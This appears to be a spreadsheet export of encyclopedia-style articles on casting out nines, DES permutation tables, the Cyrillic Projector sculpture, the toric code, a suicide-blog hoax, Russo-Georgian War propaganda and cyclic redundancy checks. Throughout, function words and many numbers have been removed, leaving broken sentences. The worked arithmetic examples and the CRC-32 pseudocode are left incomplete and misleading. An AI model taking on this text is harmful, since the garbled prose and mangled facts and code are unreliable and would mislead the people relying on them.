d_{n}+d_{n-1}+\cdots +d_{0}} difference original number digit {\displaystyle {\begin{aligned}&amp;10^{n}d_{n}+10^{n-1}d_{n-1}+\cdots +d_{0}-\left(d_{n}+d_{n-1}+\cdots +d_{0}\right)\\={}&amp;\left(10^{n}-1\right)d_{n}+\left(10^{n-1}-1\right)d_{n-1}+\cdots +9d_{1}.\end{aligned}}} because numbers form {\displaystyle 10^{i}-1} always divisible (since {\displaystyle 10^{i}-1=9\times \left(10^{i-1}+10^{i-2}+\cdots +1\right)} replacing original number digit effect casting {\displaystyle {\frac {10^{n}-1}{9}}d_{n}+{\frac {10^{n-1}-1}{9}}d_{n-1}+\cdots +d_{1}} lots digital roots procedure described preceding paragraph repeatedly applied result previous application, eventual result single-digit number possible exception one, "cast out". resulting single-digit number called digital root original. exception occurs original number digital root whose digit itself, therefore cast taking digit sums. number 12565, instance, digit 1+2+5+6+5 which, turn, digit 1+9=10, which, turn digit 1+0=1, single-digit number. digital root 12565 therefore computation effect casting (12565 1)/9 1396 lots 12565. checking calculations casting nines check result arithmetical calculation casting nines, number calculation replaced digital root calculations applied digital roots. digital root result calculation compared result original calculation. mistake made calculations, digital roots must same. examples casting-out-nines used check addition, subtraction, multiplication, division given below. examples addition addend, cross pairs digits total together remains. these values called excesses. leftover digits addend digit reached. process also excesses final excess. subtraction multiplication times division works method works original numbers 'decimal' (base 10), modulus chosen differ casting equivalent taking digit sum. general 'large' integers, expressed smaller modulus (for example, modulo always sum, difference product originals. this property also preserved 'digit sum' base modulus differ calculation correct casting out, casting sides preserve correctness. however, possible previously unequal integers identical modulo average, ninth time). operation work fractions, since given fractional number unique representation. variation explanation trick learn nines digit count back one. since adding tens digit subtracting units digit, digits remain same. example, when adding itself, would thus expect digits follows: look simple multiplication: consider 17), non-negative integer written single digit non-negative integer. thus, using distributive rule, (9×n a)×(9×m 9×9×n×m 9(am since first factors multiplied sums leaving 'ab'. example, would expect base system, number base would behave like nine. limitation casting nines while extremely useful, casting nines catch errors made calculations. example, casting-out-nines method would recognize error calculation produced erroneous results etc. (that result congruent modulo particular, casting nines catch transposition errors, 1324 instead 1234. words, method catches erroneous results whose digital root digits different correct result. history form casting nines known ancient greek mathematicians described roman bishop hippolytus (170–235) refutation heresies, briefly syrian neoplatonist philosopher iamblichus (c.245–c.325) commentary introduction arithmetic nicomachus gerasa. both hippolytus's iamblichus's descriptions, though, limited explanation repeated digital sums greek numerals used compute unique "root" neither displayed awareness procedure could used check results arithmetical computations. earliest known surviving work describes casting nines used check results arithmetical computations mahâsiddhânta, written around indian mathematician astronomer, aryabhata (c.920–c.1000 writing 1020, persian polymath, sina (avicenna) (c.980–1037), also gave full details called "hindu method" checking arithmetical calculations casting nines.the procedure described fibonacci liber abaci. routinely taught european schools 20th. synergetics, buckminster fuller claims used casting-out-nines "before world fuller explains cast nines makes claims resulting 'indigs,' fails note casting nines result false positives. method bears striking resemblance standard signal processing computational error detection error correction methods, typically using similar modular arithmetic checksums simpler check digits. generalization this method generalized determine remainders division certain prime numbers. since {\displaystyle n{\bmod {3}}=(n{\bmod {9}}){\bmod {3}}.} remainder casting nines remainder division three. casting ninety nines done adding groups digits instead digit. since 11·9 {\displaystyle n{\bmod {1}}1=(n{\bmod {9}}9){\bmod {1}}1.} remainder casting ninety nines remainder division eleven. this called casting elevens. result also calculated directly alternately adding subtracting digits make {\displaystyle eleven divides {\displaystyle eleven divides sum.casting nine hundred ninety nines done adding groups three digits. since 37·27 999, {\displaystyle n{\bmod {3}}7=(n{\bmod {9}}99){\bmod {3}}7.} remainder casting nine hundred ninety nines remainder division thirty seven. notes references datta, bibhatibhusan; singh, avadhesh narayan (1962) [1935], history hindu mathematics: source book, bombay: asia publishing house fuller, buckminster (april 1982), synergetics: explorations geometry thinking (new ed.), york, macmillan publishing company, isbn 0-02-065320-4 heath, thomas (1921), history greek mathematics, vol. from thales euclid, oxford: oxford university press hippolytus rome (1919) [c.230], refutation heresies, translated macmahon, rev. j.h., roberts donaldson (1919, 9–153) krantz, steven (2010), episodic history mathematics—mathematical culture problem solving, mathematical association america, isbn 978-0-88385-766-3, lccn 2010921168 long, calvin (1972), elementary introduction number theory (2nd ed.), lexington: heath company, lccn 77171950 roberts, rev. alexander, d.d.; donaldson, james, ll.d., eds. (1919), ante-nicene fathers. translations writings fathers a.d. 325., vol. american reprint edinburgh edition, york, charles scribner's sons external links weisstein, eric "casting nines". mathworld. "numerology" buckminster fuller "paranormal numbers" paul niquette grime, james. "casting nines" (video). youtube. brady haran. retrieved september 2017.</t>
  </si>
  <si>
    <t>DES supplementary material</t>
  </si>
  <si>
    <t>this article details various tables referenced data encryption standard (des) block cipher. bits bytes arranged endian order document. that number always significant bit. initial permutation (ip) this table specifies input permutation 64-bit block. meaning follows: first output taken 58th input; second 50th bit, last output taken input. this information presented table ease presentation; vector, matrix. final permutation (ip−1) final permutation inverse initial permutation; table interpreted similarly. expansion function expansion function interpreted initial final permutations. note bits input duplicated output; e.g. fifth input duplicated sixth eighth output. thus, 32-bit half-block expanded bits. permutation permutation shuffles bits 32-bit half-block. permuted choice (pc-1) "left" "right" halves table show bits input form left right sections schedule state. note bits bits input selected; remaining eight specified parity bits. permuted choice (pc-2) this permutation selects 48-bit subkey round 56-bit key-schedule state. this permutation ignore bits below: permuted choice "pc-2" ignored bits 9,18,22,25,35,38,43,54. substitution boxes (s-boxes) this table lists eight s-boxes used des. each s-box replaces 6-bit input 4-bit output. given 6-bit input, 4-bit output found selecting using outer bits, column using inner four bits. example, input "011011" outer bits "01" inner bits "1101"; noting first "00" first column "0000", corresponding output s-box would "1001" (=9), value second row, 14th column. (see s-box). generation main supplied user bits. following operations performed drop parity bits drop bits grey positions (8x) make space operation round. after bits permuted according following table, table major way, means, actual position substitute column. bits rotation before round sub-key selected, half schedule state rotated left number places. this table specifies number places rotated. divided 28-bit parts each part shifted left (circular) bits after shifting, parts combined form temp-key compression compression p-box changes bits bits key, used corresponding round. table major way, means, actual position substitute column. after return round-key bits called function, i.e. round. references data encryption standard (des) (pdf). national institute standards technology (nist). 1999-10-25. fips 46-3. external links algorithm illustrated</t>
  </si>
  <si>
    <t>Cyrillic Projector</t>
  </si>
  <si>
    <t>cyrillic projector sculpture created american artist sanborn early 1990s, purchased university north carolina charlotte 1997. currently installed campus' friday fretwell buildings. encrypted trilogy encrypted sculpture cyrillic projector part encrypted family three intricate puzzle-sculptures sanborn, named kryptos antipodes. kryptos sculpture (located headquarters langley, virginia) text duplicated antipodes. antipodes sides latin alphabet cyrillic. latin side similar kryptos. cyrillic side similar cyrillic projector. solution encrypted text cyrillic projector first reportedly solved frank corr early july 2003, followed equivalent decryption mike bales september year. both endeavors gave results russian language. first english translation text elonka dunin. sculpture includes messages. first russian text explains psychological control develop maintain potential sources information. second partial quote soviet dissident, nobel peace prize awarded scientist sakharov. text classified memo, detailing concerns report 1982 pugwash conference going used u.s. anti-soviet propaganda purposes. notes references "campus mystery solved". 2003-10-08. archived original 2006-04-20. retrieved 2007-01-30. external links transcript cyrillic projector text kryptos website kryptos group press release, 2003, solution russian) игры разума, подвижного ртуть, september 2003:computerra</t>
  </si>
  <si>
    <t>Toric code</t>
  </si>
  <si>
    <t>toric code topological quantum error correcting code, example stabilizer code, defined two-dimensional spin lattice. simplest well studied quantum double models. also simplest example topological order—z2 topological order (first studied context spin liquid 1991). toric code also considered lattice gauge theory particular limit. introduced alexei kitaev. toric code gets name periodic boundary conditions, giving shape torus. these conditions give model translational invariance, useful analytic study. however, experimental realization requires open boundary conditions, allowing system embedded surface. resulting code typically known planar code. this identical behaviour toric code most, all, cases. error correction computation toric code defined two-dimensional lattice, usually chosen square lattice, spin-½ degree freedom located edge. they chosen periodic. stabilizer operators defined spins around vertex {\displaystyle plaquette face vertex dual lattice) {\displaystyle lattice follows, {\displaystyle a_{v}=\prod _{i\in v}\sigma _{i}^{x},\,\,b_{p}=\prod _{i\in p}\sigma _{i}^{z}.} where {\displaystyle i\in denote edges touching vertex {\displaystyle {\displaystyle i\in denote edges surrounding plaquette {\displaystyle stabilizer space code stabilizers trivially, hence state {\displaystyle |\psi \rangle space holds {\displaystyle a_{v}|\psi \rangle =|\psi \rangle ,\,\,\forall v,\,\,b_{p}|\psi \rangle =|\psi \rangle ,\,\,\forall toric code, space four-dimensional, used store qubits quantum information. this proven considering number independent stabilizer operators. occurrence errors move state stabilizer space, resulting vertices plaquettes condition hold. positions violations syndrome code, used error correction. unique nature topological codes, toric code, stabilizer violations interpreted quasiparticles. specifically, code state {\displaystyle |\phi \rangle that, {\displaystyle a_{v}|\phi \rangle =-|\phi \rangle quasiparticle known {\displaystyle anyon said exist vertex {\displaystyle similarly violations {\displaystyle b_{p}} associated called {\displaystyle anyons plaquettes. stabilizer space therefore corresponds anyonic vacuum. single spin errors cause pairs anyons created transported around lattice. when errors create anyon pair move anyons, imagine path connecting composed links acted upon. anyons meet annihilated, path describes loop. loop topologically trivial, effect stored information. annihilation anyons, case, corrects errors involved creation transport. however, loop topologically non-trivial, though re-annihilation anyons returns state stabilizer space, also implements logical operation stored information. errors, case, therefore corrected consolidated. consider noise model phase errors occur independently spin, probability when low, create sparsely distributed pairs anyons moved point creation. correction achieved identifying pairs anyons created equivalence class), re-annihilating remove errors. increases, however, becomes ambiguous anyons paired without risking formation topologically non-trivial loops. this gives threshold probability, error correction almost certainly succeed. through mapping random-bond ising model, critical probability found around 11%.other error models also considered, thresholds found. cases studied far, code found saturate hashing bound. error models, biased errors errors occur often phase errors vice versa, lattices square lattice must used achieve optimal thresholds.these thresholds upper limits useless unless efficient algorithms found achieve them. well-used algorithm minimum weight perfect matching. when applied noise model independent flip errors, threshold around 10.5% achieved. this falls little short maximum. however, matching work well correlations phase errors, depolarizing noise. means perform quantum computation logical information stored within toric code considered, properties code providing fault-tolerance. shown extending stabilizer space using 'holes', vertices plaquettes stabilizers enforced, allows many qubits encoded code. however, universal unitary gates cannot fault-tolerantly implemented unitary operations additional techniques required achieve quantum computing. example, universal quantum computing achieved preparing magic states encoded quantum stubs called tidbits used teleport required additional gates replaced qubit. furthermore, preparation magic states must fault tolerant, achieved magic state distillation noisy magic states. measurement based scheme quantum computation based upon principle found, whose error threshold highest known two-dimensional architecture. hamiltonian self-correction since stabilizer operators toric code quasilocal, acting spins located near two-dimensional lattice, unrealistic define following hamiltonian, {\displaystyle h_{\rm {tc}}=-j\sum _{v}a_{v}-j\sum _{p}b_{p},\,\,\,j&gt;0.} ground state space hamiltonian stabilizer space code. excited states correspond anyons, energy proportional number. local errors therefore energetically suppressed gap, shown stable local perturbations. however, dynamic effects perturbations still cause problems code.the also gives code certain resilience thermal errors, allowing correctable almost surely certain critical time. this time increases {\displaystyle since arbitrary increases coupling unrealistic, protection given hamiltonian still limits. means make toric code, planar code, fully self-correcting quantum memory often considered. self-correction means hamiltonian naturally suppress errors indefinitely, leading lifetime diverges thermodynamic limit. found possible toric code long range interactions present anyons. proposals made realization another approach generalization model higher dimensions, self-correction possible quasi-local interactions. anyon model mentioned above, called {\displaystyle {\displaystyle quasiparticles associated vertices plaquettes model, respectively. these quasiparticles described anyons, non-trivial effect braiding. specifically, though species anyons bosonic respect themselves, braiding {\displaystyle {\displaystyle effect, full monodromy {\displaystyle {\displaystyle yield phase {\displaystyle such result consistent either bosonic fermionic statistics, hence anyonic. anyonic mutual statistics quasiparticles demonstrate logical operations performed topologically non-trivial loops. consider creation pair {\displaystyle anyons followed transport around topologically nontrivial loop, shown torus blue figure above, pair reannhilated. state returned stabilizer space, loop implements logical operation stored qubits. {\displaystyle anyons similarly moved loop logical operation also result. phase {\displaystyle resulting braiding anyons shows operations commute, rather anticommute. they therefore interpreted logical {\displaystyle {\displaystyle pauli operators stored qubits. corresponding logical pauli's qubit correspond {\displaystyle anyon following blue loop {\displaystyle anyon following red. braiding occurs {\displaystyle {\displaystyle pass parallel paths, phase {\displaystyle therefore arise corresponding logical operations commute. this expected since form operations acting different qubits. fact {\displaystyle {\displaystyle anyons created pairs, clear quasiparticles antiparticles. composite particle composed {\displaystyle anyons therefore equivalent vacuum, since vacuum yield pair pair annihilate vacuum. accordingly, composites bosonic statistics, since braiding always completely trivial. composite {\displaystyle anyons similarly equivalent vacuum. creation composites known fusion anyons, results written terms fusion rules. case, take form, {\displaystyle e\times e=1,\,\,\,m\times m=1.} where {\displaystyle denotes vacuum. composite {\displaystyle {\displaystyle trivial. this therefore constitutes another quasiparticle model, sometimes denoted {\displaystyle \psi fusion rule, {\displaystyle e\times m=\psi from braiding statistics anyons that, since single exchange {\displaystyle \psi involve full monodromy constituent {\displaystyle {\displaystyle phase {\displaystyle result. this implies fermionic self-statistics {\displaystyle \psi generalizations torus required form error correcting code. other surfaces also used, topological properties determining degeneracy stabilizer space. general, quantum error correcting codes defined two-dimensional spin lattices according principles known surface codes.it also possible define similar codes using higher-dimensional spins. these quantum double models string-net models, allow greater richness behaviour anyons, used advanced quantum computation error correction proposals. these include models abelian anyons, also non-abelian statistics. experimental progress explicit demonstration properties toric code state based approaches. rather attempting realize hamiltonian, simply prepare code stabilizer space. using technique, experiments able demonstrate creation, transport statistics anyons measurement topological entanglement entropy. more recent experiments also able demonstrate error correction properties code.for realizations toric code generalizations hamiltonian, much progress made using josephson junctions. theory hamiltonians implemented developed wide class topological codes. experiment also performed, realizing toric code hamiltonian small lattice, demonstrating quantum memory provided degenerate ground state.other theoretical experimental works towards realizations based cold atoms. toolkit methods used realize topological codes optical lattices explored, experiments concerning minimal instances topological order. such minimal instances toric code realized experimentally within isolated square plaquettes. progress also made simulations toric model rydberg atoms, hamiltonian effects dissipative noise demonstrated. references external links https://skepsisfera.blogspot.com/2010/04/kitaevs-toric-code.html</t>
  </si>
  <si>
    <t>90 Day Jane</t>
  </si>
  <si>
    <t>jane blog hoax anonymous woman, known jane, promised commit suicide days launching blog, tagline, "i'm going kill myself days". blog posts chronicled life days leading ostensibly planned suicide asked readers help pick method killing herself, citing christine chubbuck budd dwyer inspirations publicizing suicide. comments blog ranged sympathetic negative, npr's laura conaway writing "some [are] showing worst really, worst human beings." suicide prevention advocates frowned upon jane, fearing would encourage others emulate behavior. february 2008, revealed blog started project meant small group friends actually plan committing suicide; took blog soon after. references</t>
  </si>
  <si>
    <t>Information war during the Russo-Georgian War</t>
  </si>
  <si>
    <t>russo-georgian included extensive information war. during conflict russian military attempted steps support information campaign. russian journalists brought along russian troops report progress russians protecting citizens propagandize georgian atrocities. russians used television footage gain psychological effects well local population separatist regions. russians showed local television footage advancing forces liberating local russian population. hand, georgia unable show footage troops action. russian government also used military spokesman television interviews provide information conduct campaign, first russia.medvedev also said: "the form aggression took nothing less genocide georgia committed heaviest crimes civilians torched, sawed pieces rolled tanks."the georgian government stopped broadcasting russian channels blocked access russian websites, aftermath, limiting news coverage georgia.on 8–10 august 2008, aired several news reports georgia. reports started huge caption "genocide".on august 2008, russian ambassador georgia vyacheslav kovalenko called georgian actions "the true vandalism"."the city tskhinvali exist anymore. simply doesn't. destroyed georgian military," claimed.sergei ivanov interviewed august 2008, saying georgia attacked south ossetia instead russia attacking georgia.on august 2008, accused presenting video footage destruction tskhinvali south ossetia, shot russian cameraman, pictures destruction gori. rest august south ossetians later claimed 1,492 killed result bombing tskhinvali.on august 2008, russian major-general vyacheslav borisov announced russian troops would leave gori days later. final withdrawal gori came days borisov's announcement.bbc news world affairs correspondent paul reynolds filed story august, citing reporting refugee ossetians russia human rights watch report describing much damage tskhinvali georgian fire. according him, "one problem russians learned play media game." reynolds called attention fact western media based georgia. cause this, wrote, russia's reluctance admit western media. also wrote "mud" thrown "stuck" russia bush administration "trying turn failed military operation georgia successful diplomatic operation russia."on august 2008, york times reported russian authorities "have given western journalists little access" areas control, "russian journalists allowed move around freely."malkhaz gulashvili, president georgian times media holding, said: "georgia lost information since, unfortunately, foreign agencies frequently relied russian news sources controlled kremlin. these would spread inaccurate news foreign media reject later.""i agree lost information first days, nothing hide here," russian defence ministry spokesman andrei klyuchnikov told journalists august.on august, russian investigative committee reported confirmed civilian deaths. "perhaps reach figure given south ossetian authorities," representative said. when asked georgian deaths, representative said issue concern. however, nine days later, prime minister vladimir putin still said interview german 2,000 russian civilians killed conflict. putin also said: "and protect lives, sausage taken away what choice life sausage?" said georgia "the aggressor punched face".der spiegel accused staff members, pavel kassin, propaganda taking pro-american stance. izvestia claimed influenced ousting earlier 2008 editor-in-chief stefan aust, worked many years spiegel, replacement georg mascolo leading washington subdivision magazine.south ossetian envoy russia dmitry medoyev [falsely] claimed interview "they started fact georgian peacekeeping battalion fixedly shot back russian soldiers. same peacekeepers, like [the georgians] were. wearing uniform. command, [the georgians] brought forward shot back." also claimed georgian soldiers influence "100% american made psychotropic drugs".russia alleged american citizen fought georgian forces. deputy chief general staff anatoly nogovitsyn displayed photocopies american passport news briefing, claiming passport found georgian fighting position. passport owner u.s. authorities denied accusation, saying passport lost elsewhere.during war, radio station echo moscow broadcast balanced accounts show called "with their eyes." august 2008, prime minister putin gathered thirty-five leading media executives sochi. putin paid attention aleksei venediktov, editor-in-chief echo moscow, criticized station coverage war. after early september 2008, german newspaper spiegel caught fabrication anti-georgian claims. paper published article saying internal reports osce effectively blamed georgia war.on september 2008, head russian investigative committee reported managed confirm civilian deaths. july 2009, figure revised 162.temur iakobashvili, georgian minister, said ongoing "information war" international public opinion. accused russia spending money propaganda campaign alter opinion russian forces invaded occupied georgia.in november 2008, alexander bastrykin, chairman investigative committee prosecutor general's office, [falsely] claimed south ossetia invaded mercenaries united states, czech republic, turkey, ukraine chechnya.mark ames asserted december 2008, reporting york times biased towards georgia.human rights watch called russian death toll figure 2,000 unfounded. human rights watch also stated "does capacity make definitive estimate number civilian casualties." cited different investigative groups, provided numbers civilian 300-400 total casualties. russia south ossetia unable explain calculation claims 2,000 victims carried out. this initial claim also significantly influenced public sentiment south ossetia bitterness toward georgians.in march 2009, lenta.ru published interview russian journalist vadim rechkalov. rechkalov arrived tskhinvali war. said russian bm-21 grads shelled tskhinvali. also said found august 2008 rumors "total destruction" tskhinvali false.according political scientist svante cornell, moscow spent millions public-relations campaign convince world georgia, russia, began (despite abundant evidence, including russian media, contrary).in august 2009, reported analysts said propaganda still active sides sought gain moral high ground".nicolai petro, professor politics university rhode island, claimed western media coverage biased first, became balanced november, 2008, osce officials ryan grist stephen young confirmed russian version events georgian attack unprovoked indiscriminate. professor petro said initial impressions conveyed respected news outlets tend linger even story later changes radically, therefore surprising american pundits politicians continue refer events last august “russian aggression,” even though subsequent reporting debunked myth."in march 2010, reported russian investigative committee prosecutor's office [falsely] claimed evidence mercenaries una-unso fighting alongside georgians. according investigators, ukrainian mercenaries recruited financially supported ministry internal affairs georgia.former moscow correspondent guardian luke harding wrote book mafia state russian state-controlled media failed mention ethnic cleansing georgians south ossetia focus solely martyrdom south ossetians. also noted ethnic cleansing georgians looked like systemic attempt drive georgians redraw georgia rather revenge. according him, kremlin launched "furious attack" foreign journalists intimated were, reality, agents cia. kremlin kept foreign journalists away ethnic georgian villages inside south ossetia. american british journalists allowed travel independently inside south ossetia. reported november 2008, went press department russian foreign ministry renew accreditation, official spoke furious reporting asked repeatedly wife, family “worried something might happen” stayed russia.in 2012, russian investigative committee prosecutor's office still conducting investigation events south ossetia. committee [falsely] claimed confirmed attempts discredit russian military. according them, russians entered gori, ukrainian mercenaries dressed russian troops participated making photo video footage showed attacks civilians looting georgian villages.in early 2014, book putin's wars: rise russia's imperialism published offered first systematic analysis wider historical context. author examined russian wartime propaganda explained russian propaganda transformed victim (georgia) aggressor. secrets russia's propaganda machine inside news network putin propaganda? russia's online troll army huge, hilarious already everywhere russian lessons clip media manipulation russian) andrei illarionov's analysis origin spiegel's fabricated fact russian) andrei illarionov's criticism klussman spiegel also psychological operations (russia) references</t>
  </si>
  <si>
    <t>Cyclic redundancy check</t>
  </si>
  <si>
    <t>cyclic redundancy check (crc) error-detecting code commonly used digital networks storage devices detect accidental changes digital data. blocks data entering systems short check value attached, based remainder polynomial division contents. retrieval, calculation repeated and, event check values match, corrective action taken data corruption. crcs used error correction (see bitfilters).crcs called check (data verification) value redundancy expands message without adding information) algorithm based cyclic codes. crcs popular simple implement binary hardware, easy analyze mathematically, particularly good detecting common errors caused noise transmission channels. because check value fixed length, function generates occasionally used hash function. introduction crcs based theory cyclic error-correcting codes. systematic cyclic codes, encode messages adding fixed-length check value, purpose error detection communication networks, first proposed wesley peterson 1961. cyclic codes simple implement benefit particularly well suited detection burst errors: contiguous sequences erroneous data symbols messages. this important burst errors common transmission errors many communication channels, including magnetic optical storage devices. typically n-bit applied data block arbitrary length detect single error burst longer bits, fraction longer error bursts detect 2−n). specification code requires definition so-called generator polynomial. this polynomial becomes divisor polynomial long division, takes message dividend quotient discarded remainder becomes result. important caveat polynomial coefficients calculated according arithmetic finite field, addition operation always performed bitwise-parallel (there carry digits). practice, commonly used crcs employ galois field, simply finite field, elements, gf(2). elements usually called comfortably matching computer architecture. called n-bit check value bits long. given multiple crcs possible, different polynomial. such polynomial highest degree means terms. words, polynomial length encoding requires bits. note polynomial specifications either drop lsb, since always associated polynomial typically name form crc-n-xxx table below. simplest error-detection system, parity bit, fact 1-bit crc: uses generator polynomial (two terms), name crc-1. application crc-enabled device calculates short, fixed-length binary sequence, known check value crc, block data sent stored appends data, forming codeword. when codeword received read, device either compares check value freshly calculated data block, equivalently, performs whole codeword compares resulting check value expected residue constant. values match, block contains data error. device take corrective action, rereading block requesting sent again. otherwise, data assumed error-free (though, small probability, contain undetected errors; inherent nature error-checking). data integrity crcs specifically designed protect common types errors communication channels, provide quick reasonable assurance integrity messages delivered. however, suitable protecting intentional alteration data. firstly, authentication, attacker edit message recompute without substitution detected. when stored alongside data, crcs cryptographic hash functions protect intentional modification data. application requires protection attacks must cryptographic authentication mechanisms, message authentication codes digital signatures (which commonly based cryptographic hash functions). secondly, unlike cryptographic hash functions, easily reversible function, makes unsuitable digital signatures.thirdly, satisfies relation similar linear function accurately, affine function): {\displaystyle \operatorname {crc} (x\oplus y)=\operatorname {crc} (x)\oplus \operatorname {crc} (y)\oplus {\displaystyle depends length {\displaystyle {\displaystyle this also stated follows, {\displaystyle {\displaystyle {\displaystyle length {\displaystyle \operatorname {crc} (x\oplus y\oplus z)=\operatorname {crc} (x)\oplus \operatorname {crc} (y)\oplus \operatorname {crc} (z);} result, even encrypted stream cipher uses combining operation mode block cipher effectively turns stream cipher, cfb), message associated manipulated without knowledge encryption key; well-known design flaws wired equivalent privacy (wep) protocol. computation compute n-bit binary crc, line bits representing input row, position 1)-bit pattern representing crc's divisor (called "polynomial") underneath left row. example, shall encode bits message 3-bit crc, polynomial polynomial written binary coefficients; 3rd-degree polynomial coefficients (1x3 case, coefficients result calculation bits long, called 3-bit crc. however, need bits explicitly state polynomial. start message encoded: 11010011101100 this first padded zeros corresponding length crc. this done resulting code word systematic form. here first calculation computing 3-bit crc: 11010011101100 &lt;--- input right padded bits 1011 &lt;--- divisor bits) ------------------ 01100011101100 &lt;--- result algorithm acts bits directly divisor step. result iteration bitwise polynomial divisor bits bits divisor simply copied directly step. divisor shifted right align highest remaining input, process repeated divisor reaches right-hand input row. here entire calculation: 11010011101100 &lt;--- input right padded bits 1011 &lt;--- divisor 01100011101100 &lt;--- result (note first four bits divisor beneath, rest bits unchanged) 1011 &lt;--- divisor 00111011101100 1011 00010111101100 1011 00000001101100 &lt;--- note divisor moves align next dividend (since quotient step zero) 1011 words, necessarily move iteration) 00000000110100 1011 00000000011000 1011 00000000001110 1011 00000000000101 ----------------- 00000000000000 &lt;--- remainder bits). division algorithm stops dividend equal zero. since leftmost divisor zeroed every input touched, process ends bits input nonzero bits right-hand row. these bits remainder division step, also value function (unless chosen specification calls postprocessing). validity received message easily verified performing calculation again, time check value added instead zeroes. remainder equal zero detectable errors. 11010011101100 &lt;--- input check value 1011 &lt;--- divisor 01100011101100 &lt;--- result 1011 &lt;--- divisor 00111011101100 ...... 00000000001110 1011 00000000000101 ------------------ 00000000000000 &lt;--- remainder following python code outlines function return initial remainder chosen input polynomial, either initial padding. note code works string inputs rather numbers: crc-32 algorithm this practical algorithm crc-32 variant crc. crctable memoization calculation would repeated byte message (computation cyclic redundancy checks multi-bit computation). function crc32 input: data: bytes array bytes output: crc32: uint32 32-bit unsigned crc-32 value// initialize crc-32 starting value crc32 0xfffffffffor byte data nlookupindex (crc32 byte) 0xff crc32 (crc32 crctable[nlookupindex] crctable array 32-bit constants// finalize crc-32 value inverting bits crc32 crc32 0xffffffff return crc32 algorithm looks such: mathematics mathematical analysis division-like process reveals select divisor guarantees good error-detection properties. analysis, digits strings taken coefficients polynomial variable x—coefficients elements finite field gf(2) (the integers modulo i.e. either zero one), instead familiar numbers. binary polynomials mathematical ring. designing polynomials selection generator polynomial important part implementing algorithm. polynomial must chosen maximize error-detecting capabilities minimizing overall collision probabilities. important attribute polynomial length (largest degree(exponent) term polynomial), direct influence length computed check value. commonly used polynomial lengths bits (crc-8), bits (crc-16), bits (crc-32), bits (crc-64).a called n-bit check value n-bits. given multiple crcs possible, different polynomial. such polynomial highest degree hence terms (the polynomial length remainder length name form crc-n-xxx. design polynomial depends maximum total length block protected (data bits), desired error protection features, type resources implementing crc, well desired performance. common misconception "best" polynomials derived either irreducible polynomials irreducible polynomials times factor adds code ability detect errors affecting number bits. reality, factors described enter selection polynomial lead reducible polynomial. however, choosing reducible polynomial result certain proportion missed errors, quotient ring zero divisors. advantage choosing primitive polynomial generator code resulting code maximal total block length sense 1-bit errors within block length different remainders (also called syndromes) therefore, since remainder linear function block, code detect 2-bit errors within block length. {\displaystyle degree primitive generator polynomial, maximal total block length {\displaystyle 2^{r}-1} associated code able detect single-bit double-bit errors. improve situation. generator polynomial {\displaystyle g(x)=p(x)(1+x)} {\displaystyle primitive polynomial degree {\displaystyle r-1} maximal total block length {\displaystyle 2^{r-1}-1} code able detect single, double, triple number errors. polynomial {\displaystyle g(x)} admits factorizations chosen balance maximal total blocklength desired error detection power. codes powerful class polynomials. they subsume examples above. regardless reducibility properties generator polynomial degree includes "+1" term, code able detect error patterns confined window contiguous bits. these patterns called "error bursts". specification concept error-detecting code gets complicated implementer standards committee uses design practical system. here complications: sometimes implementation prefixes fixed pattern bitstream checked. this useful clocking errors might insert 0-bits front message, alteration would otherwise leave check value unchanged. usually, always, implementation appends 0-bits size crc) bitstream checked polynomial division occurs. such appending explicitly demonstrated computation article. this convenience remainder original bitstream check value appended exactly zero, checked simply performing polynomial division received bitstream comparing remainder zero. associative commutative properties exclusive-or operation, practical table driven implementations obtain result numerically equivalent zero-appending without explicitly appending zeroes, using equivalent, faster algorithm combines message bitstream stream shifted register. sometimes implementation exclusive-ors fixed pattern remainder polynomial division. order: some schemes view low-order byte "first", polynomial division means "leftmost", contrary customary understanding "low-order". this convention makes sense serial-port transmissions crc-checked hardware, widespread serial-port transmission conventions transmit bytes least-significant first. byte order: with multi-byte crcs, confusion whether byte transmitted first stored lowest-addressed byte memory) least-significant byte (lsb) most-significant byte (msb). example, 16-bit schemes swap bytes check value. omission high-order divisor polynomial: since high-order always since n-bit must defined 1)-bit divisor overflows n-bit register, writers assume unnecessary mention divisor's high-order bit. omission low-order divisor polynomial: since low-order always authors philip koopman represent polynomials high-order intact, without low-order (the {\displaystyle x^{0}} term). this convention encodes polynomial complete degree integer.these complications mean three common ways express polynomial integer: first two, mirror images binary, constants found code; third number found koopman's papers. case, term omitted. polynomial {\displaystyle x^{4}+x+1} transcribed 0b0011, representing {\displaystyle x^{4}+(0x^{3}+0x^{2}+1x^{1}+1x^{0})} (msb-first code) 0b1100, representing {\displaystyle (1x^{0}+1x^{1}+0x^{2}+0x^{3})+x^{4}} (lsb-first code) 0b1001, representing {\displaystyle (1x^{4}+0x^{3}+0x^{2}+1x^{1})+x^{0}} (koopman notation)in table shown obfuscation crcs proprietary protocols might obfuscated using non-trivial initial value final xor, techniques cryptographic strength algorithm reverse engineered using straightforward methods. standards common numerous varieties cyclic redundancy checks incorporated technical standards. means algorithm, degree, suit every purpose; koopman chakravarty recommend selecting polynomial according application requirements expected distribution message lengths. number distinct crcs confused developers, situation authors sought address. there three polynomials reported crc-12, twenty-two conflicting definitions crc-16, seven crc-32.the polynomials commonly applied efficient ones possible. since 1993, koopman, castagnoli others surveyed space polynomials bits size, finding examples much better performance terms hamming distance given message size) polynomials earlier protocols, publishing best improving error detection capacity future standards. particular, iscsi sctp adopted findings research, crc-32c (castagnoli) polynomial. design 32-bit polynomial commonly used standards bodies, crc-32-ieee, result joint effort rome laboratory force electronic systems division joseph hammond, james brown shyan-shiang georgia institute technology kenneth brayer mitre corporation. earliest known appearances 32-bit polynomial 1975 publications: technical report 2956 brayer mitre, published january released public dissemination dtic august, hammond, brown liu's report rome laboratory, published may. both reports contained contributions team. during december 1975, brayer hammond presented work paper ieee national telecommunications conference: ieee crc-32 polynomial generating polynomial hamming code selected error detection performance. even castagnoli crc-32c polynomial used iscsi sctp matches performance messages bits kbits, outperforms several size ranges including common sizes internet packet. itu-t g.hn standard also uses crc-32c detect errors payload (although uses crc-16-ccitt headers). crc-32c computation implemented hardware operation (crc32) sse4.2 instruction set, first introduced intel processors' nehalem microarchitecture. aarch64 architecture also provides hardware acceleration crc-32 crc-32c operations. polynomial representations cyclic redundancy checks table lists polynomials various algorithms use. variations particular protocol impose pre-inversion, post-inversion reversed ordering described above. example, crc32 used gzip bzip2 polynomial, gzip employs reversed ordering, bzip2 not. note even parity polynomials gf(2) degree greater never primitive. even parity polynomial marked primitive table represent primitive polynomial multiplied {\displaystyle \left(x+1\right)} significant polynomial always shown representations. implementations implementation crc32 radio 3.6.1 (ca. 2012) class code checksum calculation many different crcs choose catalogues catalogue parametrised algorithms polynomial also mathematics 